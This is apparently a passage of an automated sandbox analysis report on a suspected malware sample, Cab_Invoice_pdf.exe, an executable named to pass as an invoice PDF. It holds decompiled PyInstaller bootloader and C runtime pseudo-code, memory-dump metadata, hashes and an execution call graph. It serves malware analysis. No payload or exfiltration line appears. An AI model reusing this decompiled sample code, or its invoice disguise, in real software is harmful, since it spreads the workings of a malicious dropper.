										L01319803(_t50);
										_t114 = _t112 + 0x10;
										__eflags = _t77;
										if(_t77 == 0) {
											_t98 = _a12292;
											goto L25;
										} else {
											_t85 = _t77;
											_t63 =  &_a4092;
											while(1) {
												_t91 =  *_t63;
												__eflags = _t91 -  *_t85;
												if(_t91 !=  *_t85) {
													break;
												}
												__eflags = _t91;
												if(_t91 == 0) {
													L17:
													_t64 = 0;
												} else {
													_t91 =  *((intOrPtr*)(_t63 + 1));
													__eflags = _t91 -  *((intOrPtr*)(_t85 + 1));
													if(_t91 !=  *((intOrPtr*)(_t85 + 1))) {
														break;
													} else {
														_t63 = _t63 + 2;
														_t85 = _t85 + 2;
														__eflags = _t91;
														if(_t91 != 0) {
															continue;
														} else {
															goto L17;
														}
													}
												}
												L19:
												__eflags = _t64;
												if(__eflags == 0) {
													L23:
													_push(_t93);
													E01312140(_t91, __eflags);
													_t101 = E01312010(_t77, __eflags, _t93);
													L01312130(_t93);
													_t115 = _t114 + 0xc;
													goto L31;
												} else {
													_t21 = _t93 + 0x2068; // 0x2068
													_t102 = _t21;
													_t52 = E01311AC0(_t102, 0x1000, "%s", _t77);
													_t115 = _t114 + 0x10;
													__eflags = _t52 - 0x1000;
													if(_t52 >= 0x1000) {
														goto L27;
													} else {
														_t22 = _t93 + 0x3068; // 0x3068
														 *((intOrPtr*)(_t93 + 0x4068)) = 1;
														_t87 = _t22 - _t102;
														__eflags = _t87;
														do {
															_t68 =  *_t102;
															_t102 = _t102 + 1;
															 *((char*)(_t87 + _t102 - 1)) = _t68;
															__eflags = _t68;
														} while (__eflags != 0);
														goto L23;
													}
												}
												goto L32;
											}
											asm("sbb eax, eax");
											_t64 = _t63 | 0x00000001;
											__eflags = _t64;
											goto L19;
										}
									} else {
										_t69 = E013121D0(_t93);
										_t114 = _t112 + 4;
										__eflags = _t69;
										if(_t69 != 0) {
											L25:
											_t52 = E01312070(_t90, _t104, _t93);
											_t115 = _t114 + 4;
											__eflags = _t52;
											if(_t52 != 0) {
												L27:
												_t53 = _t52 | 0xffffffff;
											} else {
												__eflags =  *((char*)(_t93 + 0x2068));
												_t29 = _t93 + 0x2068; // 0x2068
												_t79 = _t29;
												_t55 =  !=  ? _t79 :  &_a4092;
												E01314390("_MEIPASS2",  !=  ? _t79 :  &_a4092);
												_push("_MEIPASS2");
												E01313E40(_t79, _t93);
												_push(_t93);
												_t52 = E013180A0();
												_t115 = _t115 + 0x10;
												__eflags = _t52 - 0xffffffff;
												if(__eflags != 0) {
													E013123D0(_t52);
													_push(_t104);
													_push(_t98);
													_push(_t93);
													_push( &_v4);
													_t60 = E01314400(_t90, _t104, __eflags);
													_t117 = _t115 + 0x10;
													_t101 = _t60;
													__eflags =  *((intOrPtr*)(_t93 + 0x4068)) - 1;
													if( *((intOrPtr*)(_t93 + 0x4068)) == 1) {
														_push(_t79);
														E013140E0(_t90);
														_t117 = _t117 + 4;
													}
													E01311730(_t90, _t104, _t93);
													_t115 = _t117 + 4;
													L31:
													_t53 = _t101;
												} else {
													goto L27;
												}
											}
										} else {
											_t77 =  &_a4096;
											goto L11;
										}
									}
									L32:
									__eflags = _a12284 ^ _t115;
									E0131786A();
									return _t53;
								} else {
									_t71 = E01311690(_t104, _t93,  &_a8192);
									_t112 = _t112 + 8;
									__eflags = _t71;
									if(__eflags != 0) {
										goto L8;
									} else {
										_push( &_a8192);
										_t74 = E01311910(__eflags, "Cannot open self %s or archive %s\n",  &_v0);
										__eflags = _a12288 ^ _t112 + 0x0000000c;
										E0131786A();
										return _t74 | 0xffffffff;
									}
								}
							}
						}
					}
				} else {
					L1:
					E0131786A();
					return _t39 | 0xffffffff;
				}
			}






































                            0x01312450
                            0x01312450
                            0x01312455
                            0x0131245a
                            0x01312461
                            0x01312469
                            0x0131247e
                            0x01312483
                            0x01312485
                            0x0131248a
                            0x0131248c
                            0x01312491
                            0x013124b5
                            0x013124ba
                            0x013124bd
                            0x013124bf
                            0x00000000
                            0x013124c1
                            0x013124ce
                            0x013124d3
                            0x013124d6
                            0x013124d8
                            0x00000000
                            0x013124da
                            0x013124e7
                            0x013124ec
                            0x013124ef
                            0x013124f1
                            0x00000000
                            0x013124f3
                            0x013124f3
                            0x013124f4
                            0x01312503
                            0x01312505
                            0x01312510
                            0x01312515
                            0x01312518
                            0x0131251a
                            0x01312566
                            0x01312566
                            0x0131256d
                            0x01312574
                            0x0131257a
                            0x0131257c
                            0x01312596
                            0x013125a6
                            0x013125ad
                            0x013125b2
                            0x013125b5
                            0x013125b7
                            0x0131264f
                            0x00000000
                            0x013125bd
                            0x013125bd
                            0x013125bf
                            0x013125c6
                            0x013125c6
                            0x013125c8
                            0x013125ca
                            0x00000000
                            0x00000000
                            0x013125cc
                            0x013125ce
                            0x013125e2
                            0x013125e2
                            0x013125d0
                            0x013125d0
                            0x013125d3
                            0x013125d6
                            0x00000000
                            0x013125d8
                            0x013125d8
                            0x013125db
                            0x013125de
                            0x013125e0
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x013125e0
                            0x013125d6
                            0x013125eb
                            0x013125eb
                            0x013125ed
                            0x01312633
                            0x01312633
                            0x01312634
                            0x01312640
                            0x01312642
                            0x01312647
                            0x00000000
                            0x013125ef
                            0x013125f5
                            0x013125f5
                            0x01312601
                            0x01312606
                            0x01312609
                            0x0131260e
                            0x00000000
                            0x01312614
                            0x01312614
                            0x0131261a
                            0x01312624
                            0x01312624
                            0x01312626
                            0x01312626
                            0x01312628
                            0x0131262b
                            0x0131262f
                            0x0131262f
                            0x00000000
                            0x01312626
                            0x0131260e
                            0x00000000
                            0x013125ed
                            0x013125e6
                            0x013125e8
                            0x013125e8
                            0x00000000
                            0x013125e8
                            0x0131257e
                            0x0131257f
                            0x01312584
                            0x01312587
                            0x01312589
                            0x01312656
                            0x01312657
                            0x0131265c
                            0x0131265f
                            0x01312661
                            0x0131269d
                            0x0131269d
                            0x01312663
                            0x01312663
                            0x0131266a
                            0x0131266a
                            0x01312677
                            0x01312680
                            0x01312685
                            0x0131268a
                            0x0131268f
                            0x01312690
                            0x01312695
                            0x01312698
                            0x0131269b
                            0x013126a2
                            0x013126a7
                            0x013126a8
                            0x013126ad
                            0x013126ae
                            0x013126af
                            0x013126b4
                            0x013126b7
                            0x013126b9
                            0x013126c0
                            0x013126c2
                            0x013126c3
                            0x013126c8
                            0x013126c8
                            0x013126cc
                            0x013126d1
                            0x013126d4
                            0x013126d4
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0131269b
                            0x0131258f
                            0x0131258f
                            0x00000000
                            0x0131258f
                            0x01312589
                            0x013126d6
                            0x013126e1
                            0x013126e3
                            0x013126ee
                            0x0131251c
                            0x01312525
                            0x0131252a
                            0x0131252d
                            0x0131252f
                            0x00000000
                            0x01312531
                            0x01312538
                            0x01312543
                            0x01312558
                            0x0131255a
                            0x01312565
                            0x01312565
                            0x0131252f
                            0x0131251a
                            0x013124f1
                            0x013124d8
                            0x01312493
                            0x01312493
                            0x013124a1
                            0x013124ac
                            0x013124ac

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID:
                            • String ID: Cannot open self %s or archive %s$_MEIPASS2
                            • API String ID: 0-930416966
                            • Opcode ID: c6e44e7042ce63e9c32b94ec1c9103a8734f8e22118e63d0f5a06da82c153bb2
                            • Instruction ID: 93bdbb5c386e00a41ef0e1bbfab3993a0dbfec71828cc0138c1bc439c1b77d31
                            • Opcode Fuzzy Hash: c6e44e7042ce63e9c32b94ec1c9103a8734f8e22118e63d0f5a06da82c153bb2
                            • Instruction Fuzzy Hash: 5451B3B29043066BE72DE7399C41BFBB79CAF5036CF140929F94882249F725D618C273
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0131D646, Relevance: 5.1, APIs: 4, Instructions: 139COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E0131D646(void* __edx, short* _a4, char* _a8, int _a12, intOrPtr _a16) {
				char* _v8;
				int _v12;
				char _v16;
				char _v24;
				char _v28;
				void* __ebx;
				char _t34;
				int _t35;
				int _t38;
				long _t39;
				char* _t42;
				int _t44;
				int _t47;
				int _t53;
				intOrPtr _t55;
				void* _t56;
				char* _t57;
				char* _t62;
				char* _t63;
				void* _t64;
				int _t65;
				short* _t67;
				short* _t68;
				int _t69;
				intOrPtr* _t70;

				_t64 = __edx;
				_t53 = _a12;
				_t67 = _a4;
				_t68 = 0;
				if(_t67 == 0) {
					L3:
					if(_a8 != _t68) {
						E0131AFAE(_t53,  &_v28, _t64, _a16);
						_t34 = _v24;
						__eflags = _t67;
						if(_t67 == 0) {
							__eflags =  *((intOrPtr*)(_t34 + 0xa8)) - _t68;
							if( *((intOrPtr*)(_t34 + 0xa8)) != _t68) {
								_t69 = _t68 | 0xffffffff;
								_t35 = MultiByteToWideChar( *(_t34 + 8), 9, _a8, _t69, _t68, _t68);
								__eflags = _t35;
								if(_t35 != 0) {
									L29:
									_t28 = _t35 - 1; // -1
									_t69 = _t28;
									L30:
									__eflags = _v16;
									if(_v16 != 0) {
										_t55 = _v28;
										_t31 = _t55 + 0x350;
										 *_t31 =  *(_t55 + 0x350) & 0xfffffffd;
										__eflags =  *_t31;
									}
									return _t69;
								}
								 *((intOrPtr*)(E0131C9CE())) = 0x2a;
								goto L30;
							}
							_t70 = _a8;
							_t56 = _t70 + 1;
							do {
								_t38 =  *_t70;
								_t70 = _t70 + 1;
								__eflags = _t38;
							} while (_t38 != 0);
							_t69 = _t70 - _t56;
							goto L30;
						}
						__eflags =  *((intOrPtr*)(_t34 + 0xa8)) - _t68;
						if( *((intOrPtr*)(_t34 + 0xa8)) != _t68) {
							_t69 = _t68 | 0xffffffff;
							_t35 = MultiByteToWideChar( *(_t34 + 8), 9, _a8, _t69, _t67, _t53);
							__eflags = _t35;
							if(_t35 != 0) {
								goto L29;
							}
							_t39 = GetLastError();
							__eflags = _t39 - 0x7a;
							if(_t39 != 0x7a) {
								L21:
								 *((intOrPtr*)(E0131C9CE())) = 0x2a;
								 *_t67 = 0;
								goto L30;
							}
							_t42 = _a8;
							_t57 = _t42;
							_v8 = _t57;
							_t65 = _t53;
							__eflags = _t53;
							if(_t53 == 0) {
								L20:
								_t44 = MultiByteToWideChar( *(_v24 + 8), 1, _t42, _t57 - _t42, _t67, _t53);
								__eflags = _t44;
								if(_t44 != 0) {
									_t69 = _t44;
									goto L30;
								}
								goto L21;
							} else {
								goto L15;
							}
							while(1) {
								L15:
								_t45 =  *_t57;
								_v12 = _t65 - 1;
								__eflags =  *_t57;
								if(__eflags == 0) {
									break;
								}
								_t47 = E01325F84(__eflags, _t45 & 0x000000ff,  &_v24);
								_t62 = _v8;
								__eflags = _t47;
								if(_t47 == 0) {
									L18:
									_t65 = _v12;
									_t57 = _t62 + 1;
									_v8 = _t57;
									__eflags = _t65;
									if(_t65 != 0) {
										continue;
									}
									break;
								}
								_t62 = _t62 + 1;
								__eflags =  *_t62;
								if( *_t62 == 0) {
									goto L21;
								}
								goto L18;
							}
							_t42 = _a8;
							goto L20;
						}
						__eflags = _t53;
						if(_t53 == 0) {
							goto L30;
						}
						_t63 = _a8;
						while(1) {
							 *_t67 =  *(_t68 + _t63) & 0x000000ff;
							__eflags =  *(_t68 + _t63);
							if( *(_t68 + _t63) == 0) {
								goto L30;
							}
							_t68 =  &(_t68[0]);
							_t67 =  &(_t67[1]);
							__eflags = _t68 - _t53;
							if(_t68 < _t53) {
								continue;
							}
							goto L30;
						}
						goto L30;
					}
					 *((intOrPtr*)(E0131C9CE())) = 0x16;
					return E01321788() | 0xffffffff;
				}
				if(_t53 != 0) {
					 *_t67 = 0;
					goto L3;
				}
				return 0;
			}




























                            0x0131d646
                            0x0131d64f
                            0x0131d654
                            0x0131d657
                            0x0131d65b
                            0x0131d66a
                            0x0131d66d
                            0x0131d68d
                            0x0131d692
                            0x0131d695
                            0x0131d697
                            0x0131d765
                            0x0131d76b
                            0x0131d780
                            0x0131d78c
                            0x0131d792
                            0x0131d794
                            0x0131d7a3
                            0x0131d7a3
                            0x0131d7a3
                            0x0131d7a6
                            0x0131d7a6
                            0x0131d7aa
                            0x0131d7ac
                            0x0131d7af
                            0x0131d7af
                            0x0131d7af
                            0x0131d7af
                            0x00000000
                            0x0131d7b6
                            0x0131d79b
                            0x00000000
                            0x0131d79b
                            0x0131d76d
                            0x0131d770
                            0x0131d773
                            0x0131d773
                            0x0131d775
                            0x0131d776
                            0x0131d776
                            0x0131d77a
                            0x00000000
                            0x0131d77a
                            0x0131d69d
                            0x0131d6a3
                            0x0131d6d0
                            0x0131d6dc
                            0x0131d6e2
                            0x0131d6e4
                            0x00000000
                            0x00000000
                            0x0131d6ea
                            0x0131d6f0
                            0x0131d6f3
                            0x0131d74f
                            0x0131d754
                            0x0131d75c
                            0x00000000
                            0x0131d75c
                            0x0131d6f5
                            0x0131d6f8
                            0x0131d6fa
                            0x0131d6fd
                            0x0131d6ff
                            0x0131d701
                            0x0131d737
                            0x0131d745
                            0x0131d74b
                            0x0131d74d
                            0x0131d761
                            0x00000000
                            0x0131d761
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0131d703
                            0x0131d703
                            0x0131d703
                            0x0131d706
                            0x0131d709
                            0x0131d70b
                            0x00000000
                            0x00000000
                            0x0131d715
                            0x0131d71c
                            0x0131d71f
                            0x0131d721
                            0x0131d729
                            0x0131d729
                            0x0131d72c
                            0x0131d72d
                            0x0131d730
                            0x0131d732
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0131d732
                            0x0131d723
                            0x0131d724
                            0x0131d727
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0131d727
                            0x0131d734
                            0x00000000
                            0x0131d734
                            0x0131d6a5
                            0x0131d6a7
                            0x00000000
                            0x00000000
                            0x0131d6ad
                            0x0131d6b0
                            0x0131d6b4
                            0x0131d6b7
                            0x0131d6bb
                            0x00000000
                            0x00000000
                            0x0131d6c1
                            0x0131d6c2
                            0x0131d6c5
                            0x0131d6c7
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0131d6c9
                            0x00000000
                            0x0131d6b0
                            0x0131d674
                            0x00000000
                            0x0131d67f
                            0x0131d661
                            0x0131d667
                            0x00000000
                            0x0131d667
                            0x0131d7be

                            APIs
                            • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,?,?,?), ref: 0131D6DC
                            • GetLastError.KERNEL32 ref: 0131D6EA
                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?), ref: 0131D745
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: ByteCharMultiWide$ErrorLast
                            • String ID:
                            • API String ID: 1717984340-0
                            • Opcode ID: b09e79399e038a8ec992b5d20ba34476e85cf8a5c2cf9d57411337b18def80dc
                            • Instruction ID: 444b596832ea90282e26e2333ef3e722be24a61a2ae4c9c4c85aea112fd5360e
                            • Opcode Fuzzy Hash: b09e79399e038a8ec992b5d20ba34476e85cf8a5c2cf9d57411337b18def80dc
                            • Instruction Fuzzy Hash: E541F931600286AFDB2A9FECC84CBAEBBB9EF43328F144169F95957199D7318901C750
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Analysis Process: Cab_Invoice_pdf.exe PID: 6476 Parent PID: 2412 Cab_Invoice_pdf.exeCOMMON

                            Execution Graph

                            Execution Coverage:6.7%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:0%
                            Total number of Nodes:2000
                            Total number of Limit Nodes:67

                            Graph

                            execution_graph 17391 1319f31 17392 1319f3d ___scrt_is_nonwritable_in_current_image 17391->17392 17393 1319f49 17392->17393 17394 1319f5e 17392->17394 17410 131c9ce 17393->17410 17404 131a847 EnterCriticalSection 17394->17404 17398 1319f6a 17405 1319f9e 17398->17405 17402 1319f59 ___scrt_is_nonwritable_in_current_image 17404->17398 17419 1319fc9 17405->17419 17407 1319fab 17408 131c9ce __dosmaperr 20 API calls 17407->17408 17409 1319f77 17407->17409 17408->17409 17416 1319f94 17409->17416 17411 13244a9 _abort 20 API calls 17410->17411 17412 1319f4e 17411->17412 17413 1321788 17412->17413 17648 132170d 17413->17648 17415 1321794 17415->17402 17669 131a85b LeaveCriticalSection 17416->17669 17418 1319f9c 17418->17402 17420 1319ff1 17419->17420 17421 1319fd7 17419->17421 17439 13209c5 17420->17439 17422 131c9ce __dosmaperr 20 API calls 17421->17422 17424 1319fdc 17422->17424 17426 1321788 __cftof 26 API calls 17424->17426 17425 1319ffa 17446 13227ec 17425->17446 17436 1319fe7 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 17426->17436 17429 131a082 17433 131a09f 17429->17433 17434 131a0b1 17429->17434 17430 131a0fe 17431 131a10b 17430->17431 17430->17434 17432 131c9ce __dosmaperr 20 API calls 17431->17432 17432->17436 17449 131a2e2 17433->17449 17434->17436 17461 131a15e 17434->17461 17436->17407 17440 13209d1 17439->17440 17441 13209e6 17439->17441 17442 131c9ce __dosmaperr 20 API calls 17440->17442 17441->17425 17443 13209d6 17442->17443 17444 1321788 __cftof 26 API calls 17443->17444 17445 13209e1 17444->17445 17445->17425 17468 1322669 17446->17468 17448 131a016 17448->17429 17448->17430 17448->17436 17450 131a2f1 __wsopen_s 17449->17450 17451 13209c5 __fread_nolock 26 API calls 17450->17451 17453 131a304 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 17451->17453 17452 131786a _ValidateLocalCookies 5 API calls 17454 131a0a9 17452->17454 17455 13227ec 30 API calls 17453->17455 17460 131a310 17453->17460 17454->17436 17456 131a35e 17455->17456 17457 131a390 ReadFile 17456->17457 17456->17460 17458 131a3b7 17457->17458 17457->17460 17459 13227ec 30 API calls 17458->17459 17459->17460 17460->17452 17462 13209c5 __fread_nolock 26 API calls 17461->17462 17463 131a16f 17462->17463 17464 13227ec 30 API calls 17463->17464 17467 131a1b7 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 17463->17467 17465 131a1f5 17464->17465 17466 13227ec 30 API calls 17465->17466 17465->17467 17466->17467 17467->17436 17469 1322675 ___scrt_is_nonwritable_in_current_image 17468->17469 17470 1322695 17469->17470 17471 132267d 17469->17471 17473 1322749 17470->17473 17478 13226cd 17470->17478 17503 131c9bb 17471->17503 17475 131c9bb __dosmaperr 20 API calls 17473->17475 17477 132274e 17475->17477 17476 131c9ce __dosmaperr 20 API calls 17479 132268a ___scrt_is_nonwritable_in_current_image 17476->17479 17480 131c9ce __dosmaperr 20 API calls 17477->17480 17493 131e6a9 EnterCriticalSection 17478->17493 17479->17448 17482 1322756 17480->17482 17484 1321788 __cftof 26 API calls 17482->17484 17483 13226d3 17485 13226f7 17483->17485 17486 132270c 17483->17486 17484->17479 17487 131c9ce __dosmaperr 20 API calls 17485->17487 17494 132276e 17486->17494 17489 13226fc 17487->17489 17491 131c9bb __dosmaperr 20 API calls 17489->17491 17490 1322707 17506 1322741 17490->17506 17491->17490 17493->17483 17509 131e926 17494->17509 17496 1322780 17497 1322788 17496->17497 17498 1322799 SetFilePointerEx 17496->17498 17499 131c9ce __dosmaperr 20 API calls 17497->17499 17500 13227b1 GetLastError 17498->17500 17502 132278d 17498->17502 17499->17502 17522 131c998 17500->17522 17502->17490 17527 13244a9 GetLastError 17503->17527 17647 131e760 LeaveCriticalSection 17506->17647 17508 1322747 17508->17479 17510 131e933 17509->17510 17511 131e948 17509->17511 17512 131c9bb __dosmaperr 20 API calls 17510->17512 17513 131c9bb __dosmaperr 20 API calls 17511->17513 17515 131e96d 17511->17515 17514 131e938 17512->17514 17516 131e978 17513->17516 17517 131c9ce __dosmaperr 20 API calls 17514->17517 17515->17496 17518 131c9ce __dosmaperr 20 API calls 17516->17518 17519 131e940 17517->17519 17520 131e980 17518->17520 17519->17496 17521 1321788 __cftof 26 API calls 17520->17521 17521->17519 17523 131c9bb __dosmaperr 20 API calls 17522->17523 17524 131c9a3 __dosmaperr 17523->17524 17525 131c9ce __dosmaperr 20 API calls 17524->17525 17526 131c9b6 17525->17526 17526->17502 17528 13244c2 17527->17528 17529 13244c8 17527->17529 17546 132380c 17528->17546 17533 132451f SetLastError 17529->17533 17553 1320b10 17529->17553 17536 131c9c0 17533->17536 17534 13244e2 17560 13209eb 17534->17560 17536->17476 17539 13244fe 17573 1324297 17539->17573 17540 13244e8 17542 1324516 SetLastError 17540->17542 17542->17536 17578 1323587 17546->17578 17549 132384b TlsGetValue 17550 132383f 17549->17550 17585 131786a 17550->17585 17552 132385c 17552->17529 17558 1320b1d _abort 17553->17558 17554 1320b48 RtlAllocateHeap 17556 1320b5b 17554->17556 17554->17558 17555 1320b5d 17557 131c9ce __dosmaperr 19 API calls 17555->17557 17556->17534 17566 1323862 17556->17566 17557->17556 17558->17554 17558->17555 17600 1328686 17558->17600 17561 13209f6 RtlFreeHeap 17560->17561 17565 1320a1f __dosmaperr 17560->17565 17562 1320a0b 17561->17562 17561->17565 17563 131c9ce __dosmaperr 18 API calls 17562->17563 17564 1320a11 GetLastError 17563->17564 17564->17565 17565->17540 17567 1323587 _abort 5 API calls 17566->17567 17568 1323889 17567->17568 17569 13238a4 TlsSetValue 17568->17569 17571 1323898 17568->17571 17569->17571 17570 131786a _ValidateLocalCookies 5 API calls 17572 13238b5 17570->17572 17571->17570 17572->17534 17572->17539 17615 132426f 17573->17615 17579 13235b3 17578->17579 17580 13235b7 17578->17580 17579->17580 17581 13235d7 17579->17581 17592 1323623 17579->17592 17580->17549 17580->17550 17581->17580 17583 13235e3 GetProcAddress 17581->17583 17584 13235f3 __crt_fast_encode_pointer 17583->17584 17584->17580 17586 1317873 17585->17586 17587 1317875 IsProcessorFeaturePresent 17585->17587 17586->17552 17589 1317bc6 17587->17589 17599 1317b8a SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 17589->17599 17591 1317ca9 17591->17552 17593 1323644 LoadLibraryExW 17592->17593 17598 1323639 17592->17598 17594 1323661 GetLastError 17593->17594 17595 1323679 17593->17595 17594->17595 17596 132366c LoadLibraryExW 17594->17596 17597 1323690 FreeLibrary 17595->17597 17595->17598 17596->17595 17597->17598 17598->17579 17599->17591 17605 13286ca 17600->17605 17602 132869c 17603 131786a _ValidateLocalCookies 5 API calls 17602->17603 17604 13286c6 17603->17604 17604->17558 17606 13286d6 ___scrt_is_nonwritable_in_current_image 17605->17606 17611 1325ffe EnterCriticalSection 17606->17611 17608 13286e1 17612 1328713 17608->17612 17610 1328708 ___scrt_is_nonwritable_in_current_image 17610->17602 17611->17608 17613 1326046 _abort LeaveCriticalSection 17612->17613 17614 132871a 17613->17614 17614->17610 17621 13241af 17615->17621 17617 1324293 17618 132421f 17617->17618 17631 13240b3 17618->17631 17622 13241bb ___scrt_is_nonwritable_in_current_image 17621->17622 17627 1325ffe EnterCriticalSection 17622->17627 17624 13241c5 17628 13241eb 17624->17628 17626 13241e3 ___scrt_is_nonwritable_in_current_image 17626->17617 17627->17624 17629 1326046 _abort LeaveCriticalSection 17628->17629 17630 13241f5 17629->17630 17630->17626 17647->17508 17649 13244a9 _abort 20 API calls 17648->17649 17650 1321723 17649->17650 17651 1321782 17650->17651 17654 1321731 17650->17654 17659 1321798 IsProcessorFeaturePresent 17651->17659 17653 1321787 17655 132170d __cftof 26 API calls 17653->17655 17657 131786a _ValidateLocalCookies 5 API calls 17654->17657 17656 1321794 17655->17656 17656->17415 17658 1321758 17657->17658 17658->17415 17660 13217a3 17659->17660 17663 13215be 17660->17663 17664 13215da _abort ___scrt_fastfail 17663->17664 17665 1321606 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 17664->17665 17668 13216d7 _abort 17665->17668 17666 131786a _ValidateLocalCookies 5 API calls 17667 13216f5 GetCurrentProcess TerminateProcess 17666->17667 17667->17653 17668->17666 17669->17418 21791 1324310 21792 132431b 21791->21792 21793 132432b 21791->21793 21797 1324331 21792->21797 21798 1324344 21797->21798 21799 132434a 21797->21799 21800 13209eb _free 20 API calls 21798->21800 21801 13209eb _free 20 API calls 21799->21801 21800->21799 21802 1324356 21801->21802 21803 13209eb _free 20 API calls 21802->21803 21804 1324361 21803->21804 21805 13209eb _free 20 API calls 21804->21805 21806 132436c 21805->21806 21807 13209eb _free 20 API calls 21806->21807 21808 1324377 21807->21808 21809 13209eb _free 20 API calls 21808->21809 21810 1324382 21809->21810 21811 13209eb _free 20 API calls 21810->21811 21812 132438d 21811->21812 21813 13209eb _free 20 API calls 21812->21813 21814 1324398 21813->21814 21815 13209eb _free 20 API calls 21814->21815 21816 13243a3 21815->21816 21817 13209eb _free 20 API calls 21816->21817 21818 13243b1 21817->21818 21823 13241f7 21818->21823 21829 1324103 21823->21829 21825 132421b 21826 1324247 21825->21826 21842 1324164 21826->21842 21830 132410f ___scrt_is_nonwritable_in_current_image 21829->21830 21837 1325ffe EnterCriticalSection 21830->21837 21832 1324143 21838 1324158 21832->21838 21834 1324119 21834->21832 21835 13209eb _free 20 API calls 21834->21835 21835->21832 21836 1324150 ___scrt_is_nonwritable_in_current_image 21836->21825 21837->21834 21841 1326046 LeaveCriticalSection 21838->21841 21840 1324162 21840->21836 21841->21840 21843 1324170 ___scrt_is_nonwritable_in_current_image 21842->21843 21850 1325ffe EnterCriticalSection 21843->21850 21845 132417a 21846 13243da _abort 20 API calls 21845->21846 21847 132418d 21846->21847 21851 13241a3 21847->21851 21850->21845 21854 1326046 LeaveCriticalSection 21851->21854 22775 131ea12 22776 131ea1e _abort 22775->22776 22783 1325ffe EnterCriticalSection 22776->22783 22778 131ea2d 22784 131ea9b 22778->22784 22781 132f0f9 _abort 5 API calls 22782 131eabd 22781->22782 22783->22778 22787 1326046 LeaveCriticalSection 22784->22787 22786 131ea8d 22786->22781 22787->22786 22796 1326e00 22807 132c358 22796->22807 22798 1326e05 ___scrt_is_nonwritable_in_current_image 22813 1325ffe EnterCriticalSection 22798->22813 22800 1326e83 22818 1326e98 22800->22818 22803 1326e8f ___scrt_is_nonwritable_in_current_image 22804 1326e21 22804->22800 22806 1319813 65 API calls 22804->22806 22814 131a847 EnterCriticalSection 22804->22814 22815 1326e79 22804->22815 22806->22804 22808 132c367 22807->22808 22809 13209eb _free 20 API calls 22808->22809 22810 132c37a 22808->22810 22809->22808 22811 13209eb _free 20 API calls 22810->22811 22812 132c392 22810->22812 22811->22810 22812->22798 22813->22804 22814->22804 22821 131a85b LeaveCriticalSection 22815->22821 22817 1326e81 22817->22804 22822 1326046 LeaveCriticalSection 22818->22822 22820 1326e9f 22820->22803 22821->22817 22822->22820 18774 1325e01 18779 1325bbd 18774->18779 18777 1325e29 18784 1325bee 18779->18784 18780 131c9ce __dosmaperr 20 API calls 18781 1325ded 18780->18781 18782 1321788 __cftof 26 API calls 18781->18782 18783 1325d42 18782->18783 18783->18777 18791 132c048 18783->18791 18787 1325d37 18784->18787 18794 132b469 18784->18794 18787->18780 18787->18783 18788 132b469 40 API calls 18789 1325daa 18788->18789 18789->18787 18790 132b469 40 API calls 18789->18790 18790->18787 18813 132b745 18791->18813 18793 132c063 18793->18777 18795 132b509 18794->18795 18796 132b47d 18794->18796 18802 132b521 18795->18802 18798 131c9ce __dosmaperr 20 API calls 18796->18798 18800 1325d8b 18796->18800 18799 132b494 18798->18799 18801 1321788 __cftof 26 API calls 18799->18801 18800->18787 18800->18788 18801->18800 18803 132b537 18802->18803 18811 132b54e 18802->18811 18804 132b53e 18803->18804 18806 132b55f 18803->18806 18805 131c9ce __dosmaperr 20 API calls 18804->18805 18807 132b543 18805->18807 18808 131afae __fassign 38 API calls 18806->18808 18809 1321788 __cftof 26 API calls 18807->18809 18812 132b56a 18808->18812 18809->18811 18810 132aaea 40 API calls 18810->18812 18811->18800 18812->18810 18812->18811 18814 132b751 ___scrt_is_nonwritable_in_current_image 18813->18814 18815 132b75f 18814->18815 18817 132b798 18814->18817 18816 131c9ce __dosmaperr 20 API calls 18815->18816 18818 132b764 18816->18818 18824 132bd1f 18817->18824 18820 1321788 __cftof 26 API calls 18818->18820 18823 132b76e ___scrt_is_nonwritable_in_current_image 18820->18823 18823->18793 18875 132baf3 18824->18875 18827 132bd51 18830 131c9bb __dosmaperr 20 API calls 18827->18830 18828 132bd6a 18892 131e783 18828->18892 18831 132bd56 18830->18831 18835 131c9ce __dosmaperr 20 API calls 18831->18835 18832 132bd6f 18833 132bd78 18832->18833 18834 132bd8f 18832->18834 18836 131c9bb __dosmaperr 20 API calls 18833->18836 18905 132ba5e CreateFileW 